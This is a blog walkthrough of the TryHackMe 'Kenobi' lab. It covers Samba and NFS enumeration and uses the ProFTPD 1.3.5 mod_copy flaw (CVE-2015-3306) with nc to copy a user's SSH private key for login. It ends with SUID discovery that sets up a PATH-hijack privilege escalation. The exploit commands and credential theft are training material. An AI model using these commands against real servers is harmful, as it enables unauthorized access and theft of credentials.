<!DOCTYPE html>
<html lang="en-US"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">TryHackMe - Kenobi | FelSec - Blog</title>
<meta property="og:title" content="TryHackMe - Kenobi | FelSec - Blog" />
<meta name="twitter:title" content="TryHackMe - Kenobi | FelSec - Blog" />
<meta itemprop="name" content="TryHackMe - Kenobi | FelSec - Blog" />
<meta name="application-name" content="TryHackMe - Kenobi | FelSec - Blog" />
<meta property="og:site_name" content="" />

<meta name="description" content="Penetration Tester &amp; Security Researcher">
<meta itemprop="description" content="Penetration Tester &amp; Security Researcher" />
<meta property="og:description" content="Penetration Tester &amp; Security Researcher" />
<meta name="twitter:description" content="Penetration Tester &amp; Security Researcher" />

<meta property="og:locale" content="en-US" />
<meta name="language" content="en-US" />

  <link rel="alternate" hreflang="en" href="https://felsec.com/posts/tryhackme-kenobi/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2020-06-26T17:38:44&#43;0100 />
    <meta property="article:published_time" content=2020-06-26T17:38:44&#43;0100 />
    <meta property="og:url" content="https://felsec.com/posts/tryhackme-kenobi/" />

    
    <meta property="og:article:author" content="FelSec" />
    <meta property="article:author" content="FelSec" />
    <meta name="author" content="FelSec" />
    
    

    

    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "Article",
        "headline": "TryHackMe - Kenobi",
        "author": {
        "@type": "Person",
        "name": "FelSec"
        },
        "datePublished": "2020-06-26",
        "description": "",
        "wordCount":  3109 ,
        "mainEntityOfPage": "https://felsec.com/posts/tryhackme-kenobi/",
        "dateModified": "2020-06-26",
        "image": {
        "@type": "ImageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "FelSec - Blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.165.0">

    
    <meta property="og:url" content="https://felsec.com/posts/tryhackme-kenobi/">
	<meta property="og:site_name" content="FelSec - Blog">
	<meta property="og:title" content="TryHackMe - Kenobi">
	<meta property="og:description" content="Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.">
	<meta property="og:locale" content="en_US">
	<meta property="og:type" content="article">
		<meta property="article:section" content="posts">
		<meta property="article:published_time" content="2020-06-26T17:38:44+01:00">
		<meta property="article:modified_time" content="2020-06-26T17:38:44+01:00">
		<meta property="article:tag" content="TryHackMe">


    
    
	<meta name="twitter:card" content="summary">
	<meta name="twitter:title" content="TryHackMe - Kenobi">
	<meta name="twitter:description" content="Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.">


    

    <link rel="canonical" href="https://felsec.com/posts/tryhackme-kenobi/">
    <link href="/style.min.f8b01aadc1fa69a1eb74db876257286c546d5985a170c943eae5ee646cc82af4.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://felsec.com/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://felsec.com/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/tags/">
                        Tags
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">TryHackMe - Kenobi</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2020-06-26T17:38:44&#43;01:00" itemprop="datePublished"> 26 Jun 2020 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p><strong><em>Description:</em></strong> Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.<br>
<strong><em>Created By:</em></strong> TryHackMe<br>
<strong><em>Rating:</em></strong> Easy<br>
<strong><em>Link:</em></strong> <a href="https://www.tryhackme.com/room/kenobi">https://www.tryhackme.com/room/kenobi</a></p>
<h2 id="information-gathering">Information Gathering</h2>
<p>After entering the room, spinning up the machine and getting the host&rsquo;s IP address (10.10.93.191 for me); the first task is to scan the host to determine what ports and services are being presented to us.</p>
<p>This can be done with the following command:</p>
<pre tabindex="0"><code>nmap -Pn -sS -sV -iL host -oN kenobi.nmap
</code></pre><p>Let&rsquo;s break this command down:</p>
<ul>
<li>-Pn tells nmap to assume the host is up;</li>
<li>-sS tells nmap to run a TCP SYN Scan;</li>
<li>-sV tells nmap to get the version information (if possible);</li>
<li>-iL tells nmap to get the hosts to scan from a file;</li>
<li>and, -oN tells nmap to output the results to a (Normal text output)</li>
</ul>
<p>This results in the following output:</p>
<pre tabindex="0"><code>Host is up (0.021s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>From this we can see that we have 7 open ports and services:</p>
<ul>
<li>TCP 21 - FTP service - ProFTPD 1.3.5</li>
<li>TCP 22 - SSH service - OpenSSH 7.2p2 Ubuntu 4ubuntu2.</li>
<li>TCP 80 - HTTP service - Apache httpd 2.4.18</li>
<li>TCP 111 - RPC service - rpcbind (likely NFS)</li>
<li>TCP 139 - Samba service - smbd 3.X - 4.X</li>
<li>TCP 445 - Samba service - smbd 3.X - 4.X</li>
<li>TCP 2049 - NFS service - nfs_acl</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<p>Looking at the ports and services presented by the host there are 3 that we will be focusing on:</p>
<ol>
<li>Samba (ports 139 &amp; 445)</li>
<li>RPC</li>
<li>FTP</li>
</ol>
<h3 id="samba">Samba</h3>
<p>Firstly, let&rsquo;s start by identifying the shares presented by the Samba service. This can be done in multiple ways:</p>
<ol>
<li>nmap</li>
<li>enum4linux</li>
<li>smbmap (We won&rsquo;t cover this one)</li>
</ol>
<h4 id="nmap">nmap</h4>
<p>We can do this by running the following command:</p>
<pre tabindex="0"><code>nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse -iL host -oN SMB-Shares.nmap
</code></pre><p>This results in the following output:</p>
<pre tabindex="0"><code>Host is up (0.019s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.93.191\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: &lt;unlimited&gt;
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.93.191\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: &lt;unlimited&gt;
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.93.191\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: &lt;unlimited&gt;
|     Path: C:\var\lib\samba\printers
|     Anonymous access: &lt;none&gt;
|_    Current user access: &lt;none&gt;
</code></pre><h4 id="enum4linux">enum4linux</h4>
<p>An alternative method is to use the tool enum4linux. This tool can take longer to run than nmap, however it can be used to return more information:</p>
<pre tabindex="0"><code>enum4linux -a 10.10.93.191

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 11 18:13:13 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.93.191
RID Range ........ 500-550,1000-1050
Username ......... &#39;&#39;
Password ......... &#39;&#39;
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================
|    Enumerating Workgroup/Domain on 10.10.93.191    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

 ============================================
|    Nbtstat Information for 10.10.93.191    |
 ============================================
Looking up status of 10.10.93.191
	KENOBI          &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service
	KENOBI          &lt;03&gt; -         B &lt;ACTIVE&gt;  Messenger Service
	KENOBI          &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service
	..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Master Browser
	WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain/Workgroup Name
	WORKGROUP       &lt;1d&gt; -         B &lt;ACTIVE&gt;  Master Browser
	WORKGROUP       &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 =====================================
|    Session Check on 10.10.93.191    |
 =====================================
[+] Server 10.10.93.191 allows sessions using username &#39;&#39;, password &#39;&#39;

 ===========================================
|    Getting domain SID for 10.10.93.191    |
 ===========================================
mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can&#39;t determine if host is part of domain or part of a workgroup

 ======================================
|    OS information on 10.10.93.191    |
 ======================================
[+] Got OS info for 10.10.93.191 from smbclient:
[+] Got OS info for 10.10.93.191 from srvinfo:
mkdir failed on directory /var/run/samba/msg.lock: Permission denied
	KENOBI         Wk Sv PrQ Unx NT SNT kenobi server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 =============================
|    Users on 10.10.93.191    |
 =============================


 =========================================
|    Share Enumeration on 10.10.93.191    |
 =========================================
WARNING: The &#34;syslog&#34; option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk
	IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            KENOBI

[+] Attempting to map shares on 10.10.93.191
//10.10.93.191/print$	Mapping: DENIED, Listing: N/A
//10.10.93.191/anonymous	Mapping: OK, Listing: OK
//10.10.93.191/IPC$	[E] Can&#39;t understand response:
WARNING: The &#34;syslog&#34; option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ====================================================
|    Password Policy Information for 10.10.93.191    |
 ====================================================
[E] Dependent program &#34;polenum.py&#34; not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/

 ==============================
|    Groups on 10.10.93.191    |
 ==============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 =============================================
|    Getting printer info for 10.10.93.191    |
 =============================================
mkdir failed on directory /var/run/samba/msg.lock: Permission denied
No printers returned.

enum4linux complete on Thu Jun 11 18:13:18 2020
</code></pre><p>As we can see this returns a lot more information than is required for this room, but in a pen testing engagement can very useful.</p>
<h4 id="browsing-the-smb-share">Browsing the SMB share</h4>
<p>As we can see from both sets of output the server has 3 open shares. Two are default shares and not overly interesting, but one of them (anonymous) is very interesting.</p>
<p>Let&rsquo;s connect to the anonymous share and start digging:</p>
<pre tabindex="0"><code>smbclient //10.10.245.98/anonymous
</code></pre><p>After connecting we can use the <code>dir</code> command to print out a list of files and directories.</p>
<pre tabindex="0"><code>$ smbclient //10.10.93.191/anonymous
Enter WORKGROUP\felsec&#39;s password:
Try &#34;help&#34; to get a list of possible commands.
smb: \&gt; dir
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:56:07 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

                9204224 blocks of size 1024. 6877112 blocks available
smb: \&gt;
</code></pre><p>We can see that there is only one file stored on this share (log.txt), let&rsquo;s download it and look at the contents on our machine.</p>
<p>To download the file via smbclient, we can use the <code>get</code> command:</p>
<pre tabindex="0"><code>smb: \&gt; get log.txt
</code></pre><p>If there were more files and/or folders we could use <code>smbget</code> to recursively download all items:</p>
<pre tabindex="0"><code>smbget -R smb://10.10.93.191/anonymous
</code></pre><p>Looking at the contents of the log.txt file we find that the FTP service is running as the Kenobi user (useful information for later!), and some SSH keys have been generated for the Kenobi user and stored in the default location. We are also able to see the location of the anonymous share on the server.</p>
<pre tabindex="0"><code>Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory &#39;/home/kenobi/.ssh&#39;.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key&#39;s randomart image is:
+---[RSA 2048]----+
|                 |
|           ..    |
|        . o. .   |
|       ..=o +.   |
|      . So.o++o. |
|  o ...+oo.Bo*o  |
| o o ..o.o+.@oo  |
|  . . . E .O+= . |
|     . .   oBo.  |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to
# &#39;proftpd.conf&#39; for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# &#34;nobody&#34; and &#34;ftp&#34; for normal operation and anon.

ServerName			&#34;ProFTPD Default Installation&#34;
ServerType			standalone
DefaultServer			on
...
# Set the user and group under which the server will run.
User				kenobi
Group				kenobi
...
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
...
;   write list = root, @lpadmin
[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes
</code></pre><h3 id="rpc">RPC</h3>
<p>Looking back over the nmap output we can see that the rpcbind service is running on port 111. You can read more about rpcbind at the man page: <a href="https://linux.die.net/man/8/rpcbind">rpcbind man page</a>.</p>
<h4 id="scanning">Scanning</h4>
<p>Let&rsquo;s try and get some more information about the rpcbind service using a couple of tools (nmap and showmount).</p>
<p>We can use showmount to view the mounted volumes attached to the network files system being presented by the rpcbind service:</p>
<pre tabindex="0"><code>showmount -e 10.10.93.191

$ showmount -e 10.10.93.191
Export list for 10.10.93.191:
/var *
</code></pre><p>If we want to gather more information about the volumes we can run an nmap scan:</p>
<pre tabindex="0"><code>nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.93.191

Host is up (0.018s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount:
|_  /var *
| nfs-statfs:
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836520.0  6877108.0  22%   16.0T        32000
</code></pre><h3 id="ftp">FTP</h3>
<p>Looking at our nmap output from earlier we know that the server is running a ProFTPD 1.3.5 instance.</p>
<p>We can find all vulnerabilities affecting this version of ProFTPD by either using the <code>searchsploit</code> command or the <a href="https://www.exploit-db.com/">Exploit-DB website</a>.</p>
<pre tabindex="0"><code>$ searchsploit ProFTPd 1.3.5

------------------------------------------------------------------------ -------------------------------------
 Exploit Title                                                          |  Path
                                                                        | (/root/tools/exploitdb/)
------------------------------------------------------------------------ -------------------------------------
ProFTPd 1.3.5 - &#39;mod_copy&#39; Command Execution (Metasploit)               | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - &#39;mod_copy&#39; Remote Command Execution                     | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                               | exploits/linux/remote/36742.txt
------------------------------------------------------------------------ -------------------------------------
</code></pre><p>We can see that Exploit DB reports 3 vulnerabilities for our version of ProFTPD, however they are all actually the same vulnerability - CVE-2015-3306.</p>
<p>The FTP server implements two functions <code>SITE CPFR</code> and <code>SITE CPTO</code>. An unauthenticated user can use these commands to copy files and folders from one location on the server to another. The files and/or folders are copied with the persmissions of the ProFTPD service (in our instance the Kenobi user). More information on the vulnerabilty can be found here: <a href="https://www.cvedetails.com/cve/CVE-2015-3306/">CVE-2015-3306</a>.</p>
<p>What does this mean for us? As the service is running as the Kenobi user we wont&rsquo;t be able to access or copy any files that require root access, however we will be able to copy any files owned by the Kenobi user. This should allow us to copy the SSH private key to a location we can access (anonymous share or the network file share).</p>
<h2 id="gaining-access">Gaining Access</h2>
<p>Let&rsquo;s have a quick recap of the information we have so far:</p>
<ol>
<li>We know the server is offering Samba shares with unauthenticated access</li>
<li>We know the server is presenting a Network File Share (NFS) with anonymous access</li>
<li>We have multiple ways of exfiltrating data (Samba and RPC)</li>
<li>We have multiple ways of getting files and tools onto the server</li>
<li>The FTP server has a known weakness that we can use to copy files around the filesystem</li>
</ol>
<p>Great! Now let&rsquo;s use this to gain access to the server.</p>
<h3 id="method-1---via-nfs">Method 1 - via NFS</h3>
<p>Using the rpcbind information we found earlier we should be able to mount the /var direcroty of the remote host to our machine to retrieve this file and give us further access to the server.</p>
<p>Firstly, we need to create the temporary mount point and mount the remote directory:</p>
<pre tabindex="0"><code>$ sudo mkdir /mnt/kenobiNFS
$ sudo mount 10.10.93.191:/var /mnt/kenobiNFS
$ ls -la /mnt/kenobiNFS
total 48
drwxr-xr-x  2 root root   4096 Sep  4  2019 backups
drwxr-xr-x  9 root root   4096 Sep  4  2019 cache
drwxrwxrwt  2 root root   4096 Sep  4  2019 crash
drwxr-xr-x 40 root root   4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff  4096 Apr 12  2016 local
lrwxrwxrwx  1 root root      9 Sep  4  2019 lock -&gt; /run/lock
drwxrwxr-x 10 root netdev 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail   4096 Feb 26  2019 mail
drwxr-xr-x  2 root root   4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root      4 Sep  4  2019 run -&gt; /run
drwxr-xr-x  2 root root   4096 Jan 29  2019 snap
drwxr-xr-x  5 root root   4096 Sep  4  2019 spool
drwxrwxrwt  6 root root   4096 Jun 11 18:41 tmp
drwxr-xr-x  3 root root   4096 Sep  4  2019 www
</code></pre><p>Next we need to copy the SSH key to the /var/tmp directory:</p>
<pre tabindex="0"><code>$ nc 10.10.93.191 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.191]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
</code></pre><p>We can now copy the SSH key to another location on our system and access the server:</p>
<pre tabindex="0"><code>$ cp cp /mnt/kenobiNFS/tmp/id_rsa ~/loot/kenobi-id_rsa
$ chmod 600 ~/loot/kenobi-id_rsa
$ ssh -i ~/loot/kenobi-id_rsa kenobi@10.10.93.191
The authenticity of host &#39;10.10.93.191 (10.10.93.191)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added &#39;10.10.93.191&#39; (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user &#34;root&#34;), use &#34;sudo &lt;command&gt;&#34;.
See &#34;man sudo_root&#34; for details.

kenobi@kenobi:~$
</code></pre><h3 id="method-2---via-anonymous-share">Method 2 - via anonymous share</h3>
<p>From looking at the log file we know that the anonymous share is being presented from the Kenobi user&rsquo;s home directory <code>/home/kenobi/share</code>. This gives us a location that we are able to copy files to and can access and download files from.</p>
<pre tabindex="0"><code>$ nc 10.10.93.191 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.191]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /home/kenobi/share/id_rsa
250 Copy successful

$ smbclient //10.10.93.191/anonymous
WARNING: The &#34;syslog&#34; option is deprecated
Enter WORKGROUP\felsec&#39;s password:
Try &#34;help&#34; to get a list of possible commands.
smb: \&gt; dir
  .                                   D        0  Thu Jun 11 19:09:12 2020
  ..                                  D        0  Thu Jun 11 19:02:28 2020
  id_rsa                              N     1675  Thu Jun 11 19:09:12 2020
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

                9204224 blocks of size 1024. 6877092 blocks available
smb: \&gt; get id_rsa
getting file \id_rsa of size 1675 as id_rsa (21.0 KiloBytes/sec) (average 21.0 KiloBytes/sec)
smb: \&gt; exit
</code></pre><p>Now we have the SSH key, we need to give it the correct permissions before we can use it <code>chmod 600 id_rsa</code>.</p>
<p>We can now access the server using the SSH key:</p>
<pre tabindex="0"><code>$ ssh -i id_rsa kenobi@10.10.93.191

Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Thu Jun 11 12:46:10 2020 from 10.8.7.19
To run a command as administrator (user &#34;root&#34;), use &#34;sudo &lt;command&gt;&#34;.
See &#34;man sudo_root&#34; for details.

kenobi@kenobi:~$
</code></pre><p>Now we have access to the server we can obtain the user flag, and start looking towards elevating our privileges to root.</p>
<h2 id="elevating-privileges">Elevating Privileges</h2>
<p>There are a few common ways to elevate a user&rsquo;s privileges on a Linux system, with one of the main ones being the exploitation of programs with the SUID or SGID bits set.</p>
<p>SUID (Set owner User ID up on execution) is a special type of file permissions given to a file that allows the file to be executed with the permissions of the file owner. This is usually reserved for special files with specific purposes (for example, passwd), however in some cases other executes will be given this permission that can then be used to give a user elevated privileges. Some examples and further information can be found here: <a href="https://www.slashroot.in/suid-and-sgid-linux-explained-examples">https://www.slashroot.in/suid-and-sgid-linux-explained-examples</a></p>
<p>The following one liner can be used to find all files with the SUID bit set:</p>
<pre tabindex="0"><code>find / -perm -u=s -type f 2&gt;/dev/null
</code></pre><p>Running this on the server gives us:</p>
<pre tabindex="0"><code>kenobi@kenobi:~$ find / -perm -u=s -type f 2&gt;/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
</code></pre><p>The majority of these are default commands and required on the server, however there is one item <code>/usr/bin/menu</code> that stands out as different. Running this command presents us with a set of options:</p>
<pre tabindex="0"><code>kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
</code></pre><p>When we choose an option we are presented with system output, suggesting that these options are running system commands with root privileges. Fantastic! Depending on how these commands are being called we may be able to intercept the calls.</p>
<p>We can use the <code>strings</code> command to identify exactly what commands the program is running.</p>
<pre tabindex="0"><code>kenobi@kenobi:/tmp$ strings /usr/bin/menu | grep -v _
...
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
...
</code></pre><p>We can now see that the menu program is using relative calls for the curl, uname, and ifconfig programs. Relative calls make use of the user&rsquo;s <code>PATH</code> variable, which is open to exploitation as it is controlled by the user. The <code>PATH</code> variable defines the order of locations that the system will search when trying to run a program where the full path has not been specified. Let&rsquo;s start by taking a look at the Kenobi user&rsquo;s current <code>PATH</code> variable.</p>
